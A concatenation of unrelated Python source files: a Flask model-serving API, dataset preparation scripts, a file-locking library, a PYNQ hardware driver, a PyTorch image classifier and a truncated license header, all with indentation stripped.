# print(epochTime)
# # formatTime = time.strftime('%Y-%m-%d %H:%M:%S', epochTime)
# # Python Time Tuple format
# timeTuple = (2019, 5, 25, 11, 6, 30, 5, 145, -1)\
# print(time.localtime(epochTime))
# print(epochTime)
# lambda test
# g = lambda x: 3*x + 1
# num = '05'
# a = lambda x: x[0] == '0'
# print(a(num))
# print(time.time())
# Gets time offset
# print(time.altzone/3600)
# os.walk tutorial
# if platform == 'win32':
# TARGET_DIR = r'E:\School Work'
# elif platform == 'darwin':
# TARGET_DIR = '/Users/jd/Desktop/School Work'
# TARGET_DIR = '/Users/jd/Desktop/School Work'
# for i, (root, subdirs, files) in enumerate(os.walk('/Users/jd')):
# if '.cocoapods' in subdirs:
# subdirs.remove('.cocoapods')
# print('Pass', i)
# print('root:', root)
# print('subdirs:', subdirs)
# print('files:', files)
# print()
# testStr = 'application/vnd.google-apps.folder'
# newStr = testStr[-6:]
### Pickling--pickle can be overwritten with same method as creating it new
# testVar = "This is a second test"
# pickleOut = open('test.pickle', 'wb')
# pickle.dump(testVar, pickleOut)
# pickleOut.close()
# pickleIn = open('test.pickle', 'rb')
# testVar = pickle.load(pickleIn)
# pickleIn.close()
# print(testVar)
|
#This is the main application handler for Hippocrates experiment creation
#it provides functionality for its main route /experiment
#Arkangel AI
#Responsible: Nicolas Munera
from flask import Flask, jsonify, request, send_from_directory
from flask_cors import CORS,cross_origin
from six.moves import http_client
from api_functions import *
import os
app_IP = '0.0.0.0'
app= Flask(__name__)
CORS(app, support_credentials=True)
#0. Disable flask pretify for json optimization
app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False
app.config['JSON_SORT_KEYS'] = False
app.config['UPLOAD_FOLDER'] = os.getcwd()
print(os.getcwd())
@app.route('/leukemia_predict', methods=['POST'])
def leukemia_predict():
"""Simple echo service."""
json_data = request.get_json()
res_dict = api_predict(json_data)
return jsonify(res_dict)
try:
json_data = request.get_json()
res_dict = api_predict(json_data)
except Exception as e:
print('error: ', e)
return jsonify( { 'error':str(e), 'status':'error'} )
return jsonify(res_dict)
@app.route("/uploads/<path:name>")
def download_file(name):
return send_from_directory(
app.config['UPLOAD_FOLDER'], name, as_attachment=True
)
@app.route("/health_check", methods=['GET'])
def health_check():
return jsonify( {'respuesta': 'estoy vivo'} )
@app.route('/auth/info/googlejwt', methods=['GET'])
def auth_info_google_jwt():
"""Auth info with Google signed JWT."""
return auth_info()
@app.route('/auth/info/googleidtoken', methods=['GET'])
def auth_info_google_id_token():
"""Auth info with Google ID token."""
return auth_info()
@app.route('/auth/info/firebase', methods=['GET'])
@cross_origin(send_wildcard=True)
def auth_info_firebase():
"""Auth info with Firebase auth."""
return auth_info()
@app.errorhandler(http_client.INTERNAL_SERVER_ERROR)
def unexpected_error(e):
"""Handle exceptions by returning swagger-compliant json."""
logging.exception('An error occured while processing the request.')
response = jsonify({
'code': http_client.INTERNAL_SERVER_ERROR,
'message': 'Exception: {}'.format(e)})
response.status_code = http_client.INTERNAL_SERVER_ERROR
return response
if __name__ == '__main__':
app.run(host=app_IP, port=1056)
|
import argparse
import numpy as np
import scipy.io as sio
from pathlib import Path
from tqdm import tqdm
from PIL import Image
def main():
parser = create_argument_parser()
args = parser.parse_args()
generate_ccp_dataset(args)
def create_argument_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--data_root', type=str, default='datasets/clothing-co-parsing')
parser.add_argument('--save_root', type=str, default='datasets/jeans2skirt_ccp')
parser.add_argument('--cat1', type=str, default='jeans', help='category 1')
parser.add_argument('--cat2', type=str, default='skirt', help='category 2')
return parser
def generate_ccp_dataset(args):
"""Generate COCO dataset (train/val, A/B)"""
args.data_root = Path(args.data_root)
args.img_root = args.data_root / 'photos'
args.pix_ann_root = args.data_root / 'annotations' / 'pixel-level'
args.img_ann_root = args.data_root / 'annotations' / 'image-level'
args.pix_ann_ids = get_ann_ids(args.pix_ann_root)
args.img_ann_ids = get_ann_ids(args.img_ann_root)
args.label_list = sio.loadmat(str(args.data_root / 'label_list.mat'))['label_list'].squeeze()
args.save_root = Path(args.save_root)
args.save_root.mkdir()
generate_ccp_dataset_train(args, 'A', args.cat1)
generate_ccp_dataset_train(args, 'B', args.cat2)
generate_ccp_dataset_val(args, 'A', args.cat1)
generate_ccp_dataset_val(args, 'B', args.cat2)
def generate_ccp_dataset_train(args, imset, cat):
img_path = args.save_root / 'train{}'.format(imset)
seg_path = args.save_root / 'train{}_seg'.format(imset)
img_path.mkdir()
seg_path.mkdir()
cat_id = get_cat_id(args.label_list, cat)
pb = tqdm(total=len(args.pix_ann_ids))
pb.set_description('train{}'.format(imset))
for ann_id in args.pix_ann_ids:
ann = sio.loadmat(str(args.pix_ann_root / '{}.mat'.format(ann_id)))['groundtruth']
if np.isin(ann, cat_id).sum() > 0:
img = Image.open(args.img_root / '{}.jpg'.format(ann_id))
img.save(img_path / '{}.png'.format(ann_id))
seg = (ann == cat_id).astype('uint8') # get segment of given category
seg = Image.fromarray(seg * 255)
seg.save(seg_path / '{}_0.png'.format(ann_id))
pb.update(1)
pb.close()
def generate_ccp_dataset_val(args, imset, cat):
img_path = args.save_root / 'val{}'.format(imset)
seg_path = args.save_root / 'val{}_seg'.format(imset)
img_path.mkdir()
seg_path.mkdir()
cat_id = get_cat_id(args.label_list, cat)
pb = tqdm(total=len(args.img_ann_ids))
pb.set_description('val{}'.format(imset))
for ann_id in args.img_ann_ids:
ann = sio.loadmat(str(args.img_ann_root / '{}.mat'.format(ann_id)))['tags']
if np.isin(ann, cat_id).sum() > 0:
img = Image.open(args.img_root / '{}.jpg'.format(ann_id))
img.save(img_path / '{}.png'.format(ann_id))
seg = (ann == cat_id).astype('uint8') # get segment of given category
seg = Image.fromarray(seg * 255)
seg.save(seg_path / '{}_0.png'.format(ann_id))
pb.update(1)
pb.close()
def get_ann_ids(anno_path):
ids = list()
for p in anno_path.iterdir():
ids.append(p.name.split('.')[0])
return ids
def get_cat_id(label_list, cat):
for i in range(len(label_list)):
if cat == label_list[i][0]:
return i
if __name__ == '__main__':
main()
|
from lark import Tree
from src.interpreter.expression import Expression
import src.interpreter.globals as globals
from src.interpreter.userfunction import UserFunction
def func(name, args: Tree, body):
parsed_name = Expression(name, globals.codebase)
parsed_args = list(map(lambda x: Expression(x, globals.codebase), args.children[1:]))
UserFunction(parsed_name, parsed_args, body, True)
|
import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
with open("VERSION", "r", encoding="utf-8") as ver:
version = ver.read()
setuptools.setup(
name="simple-api",
version=version,
author="Karel Jilek",
author_email="los.karlosss@gmail.com",
description="A library to build a backend API (GraphQL) from Django",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/karlosss/simple_api",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
"django==3.0.7",
"graphene==2.1.8",
"graphene-django==2.10.1",
],
python_requires='>=3.6',
)
|
import abc
import atexit
import contextlib
import os
import pathlib
import random
import tempfile
import time
import typing
import logging
from . import constants
from . import exceptions
from . import portalocker
logger = logging.getLogger(__name__)
DEFAULT_TIMEOUT = 5
DEFAULT_CHECK_INTERVAL = 0.25
DEFAULT_FAIL_WHEN_LOCKED = False
LOCK_METHOD = constants.LockFlags.EXCLUSIVE | constants.LockFlags.NON_BLOCKING
__all__ = [
'Lock',
'open_atomic',
]
Filename = typing.Union[str, pathlib.Path]
def coalesce(*args: typing.Any, test_value: typing.Any = None) -> typing.Any:
'''Simple coalescing function that returns the first value that is not
equal to the `test_value`. Or `None` if no value is valid. Usually this
means that the last given value is the default value.
Note that the `test_value` is compared using an identity check
(i.e. `value is not test_value`) so changing the `test_value` won't work
for all values.
>>> coalesce(None, 1)
1
>>> coalesce()
>>> coalesce(0, False, True)
0
>>> coalesce(0, False, True, test_value=0)
False
# This won't work because of the `is not test_value` type testing:
>>> coalesce([], dict(spam='eggs'), test_value=[])
[]
'''
for arg in args:
if arg is not test_value:
return arg
@contextlib.contextmanager
def open_atomic(filename: Filename, binary: bool = True) \
-> typing.Iterator[typing.IO]:
'''Open a file for atomic writing. Instead of locking this method allows
you to write the entire file and move it to the actual location. Note that
this makes the assumption that a rename is atomic on your platform which
is generally the case but not a guarantee.
http://docs.python.org/library/os.html#os.rename
>>> filename = 'test_file.txt'
>>> if os.path.exists(filename):
... os.remove(filename)
>>> with open_atomic(filename) as fh:
... written = fh.write(b'test')
>>> assert os.path.exists(filename)
>>> os.remove(filename)
>>> import pathlib
>>> path_filename = pathlib.Path('test_file.txt')
>>> with open_atomic(path_filename) as fh:
... written = fh.write(b'test')
>>> assert path_filename.exists()
>>> path_filename.unlink()
'''
# `pathlib.Path` cast in case `path` is a `str`
path: pathlib.Path = pathlib.Path(filename)
assert not path.exists(), '%r exists' % path
# Create the parent directory if it doesn't exist
path.parent.mkdir(parents=True, exist_ok=True)
temp_fh = tempfile.NamedTemporaryFile(
mode=binary and 'wb' or 'w',
dir=str(path.parent),
delete=False,
)
yield temp_fh
temp_fh.flush()
os.fsync(temp_fh.fileno())
temp_fh.close()
try:
os.rename(temp_fh.name, path)
finally:
try:
os.remove(temp_fh.name)
except Exception:
pass
class LockBase(abc.ABC): # pragma: no cover
#: timeout when trying to acquire a lock
timeout: float
#: check interval while waiting for `timeout`
check_interval: float
#: skip the timeout and immediately fail if the initial lock fails
fail_when_locked: bool
def __init__(self, timeout: typing.Optional[float] = None,
check_interval: typing.Optional[float] = None,
fail_when_locked: typing.Optional[bool] = None):
self.timeout = coalesce(timeout, DEFAULT_TIMEOUT)
self.check_interval = coalesce(check_interval, DEFAULT_CHECK_INTERVAL)
self.fail_when_locked = coalesce(fail_when_locked,
DEFAULT_FAIL_WHEN_LOCKED)
@abc.abstractmethod
def acquire(
self, timeout: float = None, check_interval: float = None,
fail_when_locked: bool = None):
return NotImplemented
def _timeout_generator(self, timeout: typing.Optional[float],
check_interval: typing.Optional[float]) \
-> typing.Iterator[int]:
f_timeout = coalesce(timeout, self.timeout, 0.0)
f_check_interval = coalesce(check_interval, self.check_interval, 0.0)
yield 0
i = 0
start_time = time.perf_counter()
while start_time + f_timeout > time.perf_counter():
i += 1
yield i
# Take low lock checks into account to stay within the interval
since_start_time = time.perf_counter() - start_time
time.sleep(max(0.001, (i * f_check_interval) - since_start_time))
@abc.abstractmethod
def release(self):
return NotImplemented
def __enter__(self):
return self.acquire()
def __exit__(self,
exc_type: typing.Optional[typing.Type[BaseException]],
exc_value: typing.Optional[BaseException],
traceback: typing.Any, # Should be typing.TracebackType
) -> typing.Optional[bool]:
self.release()
return None
def __delete__(self, instance):
instance.release()
class Lock(LockBase):
'''Lock manager with build-in timeout
Args:
filename: filename
mode: the open mode, 'a' or 'ab' should be used for writing
truncate: use truncate to emulate 'w' mode, None is disabled, 0 is
truncate to 0 bytes
timeout: timeout when trying to acquire a lock
check_interval: check interval while waiting
fail_when_locked: after the initial lock failed, return an error
or lock the file. This does not wait for the timeout.
**file_open_kwargs: The kwargs for the `open(...)` call
fail_when_locked is useful when multiple threads/processes can race
when creating a file. If set to true than the system will wait till
the lock was acquired and then return an AlreadyLocked exception.
Note that the file is opened first and locked later. So using 'w' as
mode will result in truncate _BEFORE_ the lock is checked.
'''
def __init__(
self,
filename: Filename,
mode: str = 'a',
timeout: float = DEFAULT_TIMEOUT,
check_interval: float = DEFAULT_CHECK_INTERVAL,
fail_when_locked: bool = DEFAULT_FAIL_WHEN_LOCKED,
flags: constants.LockFlags = LOCK_METHOD, **file_open_kwargs):
if 'w' in mode:
truncate = True
mode = mode.replace('w', 'a')
else:
truncate = False
self.fh: typing.Optional[typing.IO] = None
self.filename: str = str(filename)
self.mode: str = mode
self.truncate: bool = truncate
self.timeout: float = timeout
self.check_interval: float = check_interval
self.fail_when_locked: bool = fail_when_locked
self.flags: constants.LockFlags = flags
self.file_open_kwargs = file_open_kwargs
def acquire(
self, timeout: float = None, check_interval: float = None,
fail_when_locked: bool = None) -> typing.IO:
'''Acquire the locked filehandle'''
fail_when_locked = coalesce(fail_when_locked, self.fail_when_locked)
# If we already have a filehandle, return it
fh = self.fh
if fh:
return fh
# Get a new filehandler
fh = self._get_fh()
def try_close(): # pragma: no cover
# Silently try to close the handle if possible, ignore all issues
try:
fh.close()
except Exception:
pass
exception = None
# Try till the timeout has passed
for _ in self._timeout_generator(timeout, check_interval):
exception = None
try:
# Try to lock
fh = self._get_lock(fh)
break
except exceptions.LockException as exc:
# Python will automatically remove the variable from memory
# unless you save it in a different location
exception = exc
# We already tried to the get the lock
# If fail_when_locked is True, stop trying
if fail_when_locked:
try_close()
raise exceptions.AlreadyLocked(exception)
# Wait a bit
if exception:
try_close()
# We got a timeout... reraising
raise exceptions.LockException(exception)
# Prepare the filehandle (truncate if needed)
fh = self._prepare_fh(fh)
self.fh = fh
return fh
def release(self):
'''Releases the currently locked file handle'''
if self.fh:
portalocker.unlock(self.fh)
self.fh.close()
self.fh = None
def _get_fh(self) -> typing.IO:
'''Get a new filehandle'''
return open(self.filename, self.mode, **self.file_open_kwargs)
def _get_lock(self, fh: typing.IO) -> typing.IO:
'''
Try to lock the given filehandle
returns LockException if it fails'''
portalocker.lock(fh, self.flags)
return fh
def _prepare_fh(self, fh: typing.IO) -> typing.IO:
'''
Prepare the filehandle for usage
If truncate is a number, the file will be truncated to that amount of
bytes
'''
if self.truncate:
fh.seek(0)
fh.truncate(0)
return fh
class RLock(Lock):
'''
A reentrant lock, functions in a similar way to threading.RLock in that it
can be acquired multiple times. When the corresponding number of release()
calls are made the lock will finally release the underlying file lock.
'''
def __init__(
self, filename, mode='a', timeout=DEFAULT_TIMEOUT,
check_interval=DEFAULT_CHECK_INTERVAL, fail_when_locked=False,
flags=LOCK_METHOD):
super(RLock, self).__init__(filename, mode, timeout, check_interval,
fail_when_locked, flags)
self._acquire_count = 0
def acquire(
self, timeout: float = None, check_interval: float = None,
fail_when_locked: bool = None) -> typing.IO:
if self._acquire_count >= 1:
fh = self.fh
else:
fh = super(RLock, self).acquire(timeout, check_interval,
fail_when_locked)
self._acquire_count += 1
assert fh
return fh
def release(self):
if self._acquire_count == 0:
raise exceptions.LockException(
"Cannot release more times than acquired")
if self._acquire_count == 1:
super(RLock, self).release()
self._acquire_count -= 1
class TemporaryFileLock(Lock):
def __init__(self, filename='.lock', timeout=DEFAULT_TIMEOUT,
check_interval=DEFAULT_CHECK_INTERVAL, fail_when_locked=True,
flags=LOCK_METHOD):
Lock.__init__(self, filename=filename, mode='w', timeout=timeout,
check_interval=check_interval,
fail_when_locked=fail_when_locked, flags=flags)
atexit.register(self.release)
def release(self):
Lock.release(self)
if os.path.isfile(self.filename): # pragma: no branch
os.unlink(self.filename)
class BoundedSemaphore(LockBase):
'''
Bounded semaphore to prevent too many parallel processes from running
It's also possible to specify a timeout when acquiring the lock to wait
for a resource to become available. This is very similar to
threading.BoundedSemaphore but works across multiple processes and across
multiple operating systems.
>>> semaphore = BoundedSemaphore(2, directory='')
>>> str(semaphore.get_filenames()[0])
'bounded_semaphore.00.lock'
>>> str(sorted(semaphore.get_random_filenames())[1])
'bounded_semaphore.01.lock'
'''
lock: typing.Optional[Lock]
def __init__(
self,
maximum: int,
name: str = 'bounded_semaphore',
filename_pattern: str = '{name}.{number:02d}.lock',
directory: str = tempfile.gettempdir(),
timeout=DEFAULT_TIMEOUT,
check_interval=DEFAULT_CHECK_INTERVAL):
self.maximum = maximum
self.name = name
self.filename_pattern = filename_pattern
self.directory = directory
self.lock: typing.Optional[Lock] = None
self.timeout = timeout
self.check_interval = check_interval
def get_filenames(self) -> typing.Sequence[pathlib.Path]:
return [self.get_filename(n) for n in range(self.maximum)]
def get_random_filenames(self) -> typing.Sequence[pathlib.Path]:
filenames = list(self.get_filenames())
random.shuffle(filenames)
return filenames
def get_filename(self, number) -> pathlib.Path:
return pathlib.Path(self.directory) / self.filename_pattern.format(
name=self.name,
number=number,
)
def acquire(
self,
timeout: float = None,
check_interval: float = None,
fail_when_locked: bool = None) -> typing.Optional[Lock]:
assert not self.lock, 'Already locked'
filenames = self.get_filenames()
for n in self._timeout_generator(timeout, check_interval): # pragma:
logger.debug('trying lock (attempt %d) %r', n, filenames)
# no branch
if self.try_lock(filenames): # pragma: no branch
return self.lock # pragma: no cover
raise exceptions.AlreadyLocked()
def try_lock(self, filenames: typing.Sequence[Filename]) -> bool:
filename: Filename
for filename in filenames:
logger.debug('trying lock for %r', filename)
self.lock = Lock(filename, fail_when_locked=True)
try:
self.lock.acquire()
logger.debug('locked %r', filename)
return True
except exceptions.AlreadyLocked:
pass
return False
def release(self): # pragma: no cover
self.lock.release()
self.lock = None
|
from math import ceil
import asyncio
import os
from PIL import Image
from pynq import Xlnk
from numpy import array
from ctypes import *
from . import Arduino
from . import MAILBOX_OFFSET
from . import MAILBOX_PY2IOP_CMD_OFFSET
ARDUINO_CAM_UART_PROGRAM = "arduino_cam_uart.bin"
WRITE = 0x2
READ = 0x3
class Arduino_CAM_UART(object):
'''
Testing mailbox/circular buffer
'''
def __init__(self, mb_info):
"""Return a new instance of an Arduino_mailboxTest object.
Parameters
----------
mb_info : dict
A dictionary storing Microblaze information, such as the
IP name and the reset name.
"""
self.microblaze = Arduino(mb_info, ARDUINO_CAM_UART_PROGRAM)
self.buf_manager = Xlnk()
def test(self):
self.microblaze.write_blocking_command(WRITE)
return self.microblaze.read_mailbox(0,1)
def test_2(self):
self.microblaze.write_blocking_command(READ)
return self.microblaze.read_mailbox(0,8)
|
import pdb
import os
import math
import random
import argparse
import numpy as np
from graph_utils import incidence_matrix, get_edge_count
from dgl_utils import _bfs_relational
from data_utils import process_files, save_to_file
def get_active_relations(adj_list):
act_rels = []
for r, adj in enumerate(adj_list):
if len(adj.tocoo().row.tolist()) > 0:
act_rels.append(r)
return act_rels
def get_avg_degree(adj_list):
adj_mat = incidence_matrix(adj_list)
degree = []
for node in range(adj_list[0].shape[0]):
degree.append(np.sum(adj_mat[node, :]))
return np.mean(degree)
def get_splits(adj_list, nodes, valid_rels=None, valid_ratio=0.1, test_ratio=0.1):
'''
Get train/valid/test splits of the sub-graph defined by the given set of nodes. The relations in this subbgraph are limited to be among the given valid_rels.
'''
# Extract the subgraph
subgraph = [adj[nodes, :][:, nodes] for adj in adj_list]
# Get the relations that are allowed to be sampled
active_rels = get_active_relations(subgraph)
common_rels = list(set(active_rels).intersection(set(valid_rels)))
print('Average degree : ', get_avg_degree(subgraph))
print('Nodes: ', len(nodes))
print('Links: ', np.sum(get_edge_count(subgraph)))
print('Active relations: ', len(common_rels))
# get all the triplets satisfying the given constraints
all_triplets = []
for r in common_rels:
# print(r, len(subgraph[r].tocoo().row))
for (i, j) in zip(subgraph[r].tocoo().row, subgraph[r].tocoo().col):
all_triplets.append([nodes[i], nodes[j], r])
all_triplets = np.array(all_triplets)
# delete the triplets which correspond to self connections
ind = np.argwhere(all_triplets[:, 0] == all_triplets[:, 1])
all_triplets = np.delete(all_triplets, ind, axis=0)
print('Links after deleting self connections : %d' % len(all_triplets))
# get the splits according to the given ratio
np.random.shuffle(all_triplets)
train_split = int(math.ceil(len(all_triplets) * (1 - valid_ratio - test_ratio)))
valid_split = int(math.ceil(len(all_triplets) * (1 - test_ratio)))
train_triplets = all_triplets[:train_split]
valid_triplets = all_triplets[train_split: valid_split]
test_triplets = all_triplets[valid_split:]
return train_triplets, valid_triplets, test_triplets, common_rels
def get_subgraph(adj_list, hops, max_nodes_per_hop):
'''
Samples a subgraph around randomly chosen root nodes upto hops with a limit on the nodes selected per hop given by max_nodes_per_hop
'''
# collapse the list of adj mattricees to a single matrix
A_incidence = incidence_matrix(adj_list)
# chose a set of random root nodes
idx = np.random.choice(range(len(A_incidence.tocoo().row)), size=params.n_roots, replace=False)
roots = set([A_incidence.tocoo().row[id] for id in idx] + [A_incidence.tocoo().col[id] for id in idx])
# get the neighbor nodes within a limit of hops
bfs_generator = _bfs_relational(A_incidence, roots, max_nodes_per_hop)
lvls = list()
for _ in range(hops):
lvls.append(next(bfs_generator))
nodes = list(roots) + list(set().union(*lvls))
return nodes
def mask_nodes(adj_list, nodes):
'''
mask a set of nodes from a given graph
'''
masked_adj_list = [adj.copy() for adj in adj_list]
for node in nodes:
for adj in masked_adj_list:
adj.data[adj.indptr[node]:adj.indptr[node + 1]] = 0
adj = adj.tocsr()
adj.data[adj.indptr[node]:adj.indptr[node + 1]] = 0
adj = adj.tocsc()
for adj in masked_adj_list:
adj.eliminate_zeros()
return masked_adj_list
def main(params):
adj_list, triplets, entity2id, relation2id, id2entity, id2relation = process_files(files)
meta_train_nodes = get_subgraph(adj_list, params.hops, params.max_nodes_per_hop) # list(range(750, 8500)) #
masked_adj_list = mask_nodes(adj_list, meta_train_nodes)
meta_test_nodes = get_subgraph(masked_adj_list, params.hops_test + 1, params.max_nodes_per_hop_test) # list(range(0, 750)) #
print('Common nodes among the two disjoint datasets (should ideally be zero): ', set(meta_train_nodes).intersection(set(meta_test_nodes)))
tmp = [adj[meta_train_nodes, :][:, meta_train_nodes] for adj in masked_adj_list]
print('Residual edges (should be zero) : ', np.sum(get_edge_count(tmp)))
print("================")
print("Train graph stats")
print("================")
train_triplets, valid_triplets, test_triplets, train_active_rels = get_splits(adj_list, meta_train_nodes, range(len(adj_list)))
print("================")
print("Meta-test graph stats")
print("================")
meta_train_triplets, meta_valid_triplets, meta_test_triplets, meta_active_rels = get_splits(adj_list, meta_test_nodes, train_active_rels)
print("================")
print('Extra rels (should be empty): ', set(meta_active_rels) - set(train_active_rels))
# TODO: ABSTRACT THIS INTO A METHOD
data_dir = os.path.join(params.main_dir, 'data/{}'.format(params.new_dataset))
if not os.path.exists(data_dir):
os.makedirs(data_dir)
save_to_file(data_dir, 'train.txt', train_triplets, id2entity, id2relation)
save_to_file(data_dir, 'valid.txt', valid_triplets, id2entity, id2relation)
save_to_file(data_dir, 'test.txt', test_triplets, id2entity, id2relation)
meta_data_dir = os.path.join(params.main_dir, 'data/{}'.format(params.new_dataset + '_meta'))
if not os.path.exists(meta_data_dir):
os.makedirs(meta_data_dir)
save_to_file(meta_data_dir, 'train.txt', meta_train_triplets, id2entity, id2relation)
save_to_file(meta_data_dir, 'valid.txt', meta_valid_triplets, id2entity, id2relation)
save_to_file(meta_data_dir, 'test.txt', meta_test_triplets, id2entity, id2relation)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Save adjacency matrtices and triplets')
parser.add_argument("--dataset", "-d", type=str, default="FB15K237",
help="Dataset string")
parser.add_argument("--new_dataset", "-nd", type=str, default="fb_v3",
help="Dataset string")
parser.add_argument("--n_roots", "-n", type=int, default="1",
help="Number of roots to sample the neighborhood from")
parser.add_argument("--hops", "-H", type=int, default="3",
help="Number of hops to sample the neighborhood")
parser.add_argument("--max_nodes_per_hop", "-m", type=int, default="2500",
help="Number of nodes in the neighborhood")
parser.add_argument("--hops_test", "-HT", type=int, default="3",
help="Number of hops to sample the neighborhood")
parser.add_argument("--max_nodes_per_hop_test", "-mt", type=int, default="2500",
help="Number of nodes in the neighborhood")
parser.add_argument("--seed", "-s", type=int, default="28",
help="Numpy random seed")
params = parser.parse_args()
np.random.seed(params.seed)
random.seed(params.seed)
params.main_dir = os.path.join(os.path.relpath(os.path.dirname(os.path.abspath(__file__))), '..')
files = {
'train': os.path.join(params.main_dir, 'data/{}/train.txt'.format(params.dataset)),
'valid': os.path.join(params.main_dir, 'data/{}/valid.txt'.format(params.dataset)),
'test': os.path.join(params.main_dir, 'data/{}/test.txt'.format(params.dataset))
}
main(params)
|
import time
import torch
import torch.nn as nn
import torchvision.models
import torchvision.transforms as transform
from torchvision.datasets import DatasetFolder
from PIL import Image
from torch.utils.data import Dataset, DataLoader, ConcatDataset
import numpy as np
import matplotlib.pyplot as plt
config = {
'epoch': 30,
'batch_size': 128,
'device': "cuda",
'optimizer': 'Adam',
'optim_hparas': {
'lr': 0.0001,
'weight_decay': 1e-5,
},
'save_path': 'models/model.pth'
}
# 数据增强
def loader_data(path, mode):
data_tfm = {
'train': transform.Compose([
transform.CenterCrop(224),
transform.RandomHorizontalFlip(0.5),
transform.ColorJitter(brightness=0.5),
transform.RandomAffine(degrees=20, translate=(0.2, 0.2), scale=(0.7, 1.3)),
transform.ToTensor()
]),
'test': transform.Compose([
transform.CenterCrop(224),
transform.ToTensor()
])
}
def imgs_tfm(path):
x = Image.open(path)
x = x.resize((256, 256))
return x
data = DatasetFolder(path, loader=imgs_tfm, extensions="jpg", transform=data_tfm['test'])
if mode == 'train':
argu_data = DatasetFolder(path, loader=imgs_tfm, extensions='jpg', transform=data_tfm['train'])
data = ConcatDataset([data, argu_data])
return data
def train(model, train_loader, test_loader, device):
n_epochs = config['epoch']
epoch = 0
optimizer = getattr(torch.optim, config['optimizer'])(model.parameters(), **config['optim_hparas'])
criterion = nn.CrossEntropyLoss()
best_acc = 0.0
tr_loss_record = []
tr_acc_record = []
val_loss_record = []
val_acc_record = []
while epoch < n_epochs:
epoch_start_time = time.time()
model.train()
train_loss = []
train_acc = []
for imgs, labels in train_loader:
imgs, labels = imgs.to(device), labels.to(device)
logits = model(imgs)
loss = criterion(logits, labels)
optimizer.zero_grad()
loss.backward()
grad_norm = nn.utils.clip_grad_norm_(model.parameters(), max_norm=10)
optimizer.step()
acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()
train_loss.append(loss.item())
train_acc.append(acc.item())
train_loss = sum(train_loss) / len(train_loss)
train_acc = sum(train_acc) / len(train_acc)
print(
f"[ 训练 |epoch: {epoch + 1:03d} / {n_epochs:03d} ] loss = {train_loss:.5f}, acc = {train_acc:.5f}, 耗时: {time.time() - epoch_start_time:2.2f}s")
val_loss, val_acc = dev(model, test_loader, device)
print(
f"[ 验证 |epoch: {epoch + 1:03d} / {n_epochs:03d} ] loss = {val_loss:.5f}, acc = {val_acc:.5f}, 耗时: {time.time() - epoch_start_time:2.2f}s")
if val_acc > best_acc:
best_acc = val_acc
torch.save(model.state_dict(), config['save_path'])
val_loss_record.append(val_loss)
val_acc_record.append(val_acc)
tr_loss_record.append(train_loss)
tr_acc_record.append(train_acc)
epoch += 1
return tr_loss_record, tr_acc_record, val_loss_record, val_acc_record
def dev(model, valid_loader, device):
model.eval()
criterion = nn.CrossEntropyLoss()
dev_loss = []
dev_acc = []
for imgs, labels in valid_loader:
imgs = imgs.to(device)
labels = labels.to(device)
with torch.no_grad():
logits = model(imgs)
# loss = model.cal_loss(logits, labels)
loss = criterion(logits, labels)
acc = (logits.argmax(dim=-1) == labels).float().mean()
dev_loss.append(loss.item())
dev_acc.append(acc.item())
dev_loss = sum(dev_loss) / len(dev_loss)
dev_acc = sum(dev_acc) / len(dev_acc)
return dev_loss, dev_acc
# 测试入口。传入模型,测试集数据,和训练设备(cuda)
def test(model, test_loader, device):
model.eval()
preds = []
for imgs, labels in test_loader:
with torch.no_grad():
logits = model(imgs.to(device))
preds.extend(logits.argmax(dim=-1).cpu().numpy().tolist())
return preds
def drawAcc(tr_acc, val_acc):
x = np.arange(len(tr_acc))
plt.plot(x, tr_acc, color="blue", label="Train")
plt.plot(x, val_acc, color="red", label="Test")
plt.legend(loc="upper right")
plt.show()
def drawLoss(tr_loss, val_loss):
x = np.arange(len(tr_loss))
plt.plot(x, tr_loss, color="blue", label="Train")
plt.plot(x, val_loss, color="red", label="Test")
plt.legend(loc="upper right")
plt.show()
if __name__ == '__main__':
train_path = "../data/tumor/Training"
test_path = "../data/tumor/Testing"
device = config['device']
train_set = loader_data(train_path, 'train')
test_set = loader_data(test_path, 'test')
train_loader = DataLoader(train_set, config['batch_size'], shuffle=True, num_workers=0)
test_loader = DataLoader(test_set, config['batch_size'], shuffle=False, num_workers=0)
model = torchvision.models.resnet34(pretrained=True).to(device)
num_ftrs = model.fc.in_features
model.fc = torch.nn.Linear(num_ftrs, 4).to(device)
model.device = device
for param in model.parameters():
param.requires_grad = True
tr_loss_record, tr_acc_record, val_loss_record, val_acc_record = train(model, train_loader, test_loader, device)
drawAcc(tr_acc_record, val_acc_record)
drawLoss(tr_loss_record, val_loss_record)
# 使用该模型测试,请在前面读入测试数据
# 模型保存在models目录下
# preds = test(model, 测试数据, device)
|
'''
Copyright (c) 2018, UChicago Argonne, LLC. All rights reserved.
Copyright 2018. UChicago Argonne, LLC. This software was produced
under U.S. Government contract DE-AC02-06CH11357 for Argonne National
Laboratory (ANL), which is operated by UChicago Argonne, LLC for the
U.S. Department of Energy. The U.S. Government has rights to use,
reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR
UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR
ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is
modified to produce derivative works, such modified software should
be clearly marked, so as not to confuse it with the version available
from ANL.
Additionally, redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name of UChicago Argonne, LLC, Argonne National
Laboratory, ANL, the U.S. Government, nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago
Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
